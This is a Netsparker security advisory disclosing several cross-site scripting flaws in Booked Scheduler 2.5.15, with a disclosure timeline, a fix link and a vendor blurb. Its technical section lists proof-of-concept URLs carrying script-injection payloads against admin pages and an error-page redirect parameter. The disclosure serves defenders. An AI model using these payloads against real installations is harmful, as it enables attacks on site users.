Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Booked Scheduler 2.5.15
Affected Software : Booked Scheduler
Affected Versions: 2.5.15 and possibly below
Vendor Homepage : https://www.bookedscheduler.com  
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
Netsparker Advisory Reference : NS-15-017

Technical Details
--------------------
Proof of Concept URLs for XSS in Booked Scheduler 2.5.15:

Url /phpsch/Web/admin/manage_groups.php?'"--></style></scRipt><scRipt>alert(0x000B0C)</scRipt>
Parameter Name Query Based
Parameter Type Query String
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000B0C)</scRipt>

Url /phpsch/Web/admin/manage_groups.php?'"--></style></scRipt><scRipt>alert(0x000B0C)</scRipt>
Parameter Name Query Based
Parameter Type Query String
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000B0C)</scRipt>

Url /phpsch/Web/admin/manage_reservations.php?'"--></style></scRipt><scRipt>alert(0x000A0E)</scRipt>
Parameter Name Query Based
Parameter Type Query String
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000A0E)</scRipt>

Url /phpsch/Web/admin/manage_reservations.php/'"--></style></scRipt><scRipt>alert(0x0009FC)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0009FC)</scRipt>

Url /phpsch/Web/error.php?mid=1&redirect='"--></style></scRipt><scRipt>alert(0x006C26)</scRipt>
Parameter Name redirect
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x006C26)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
15/09/2015 - First Contact
24/09/2015 - Vendor Fixed
09/11/2015 - Advisory Released

Solution
--------------------
https://sourceforge.net/projects/phpscheduleit/files/latest/download 

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities, hence it does not report any false positives. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.